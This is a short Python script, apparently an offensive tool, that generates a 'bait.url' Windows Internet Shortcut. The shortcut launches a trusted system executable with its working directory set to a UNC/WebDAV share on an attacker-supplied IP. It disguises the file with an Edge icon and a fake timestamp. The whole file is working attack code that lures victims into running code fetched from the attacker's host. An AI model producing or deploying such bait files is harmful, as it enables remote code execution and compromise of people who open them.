import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
    
    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()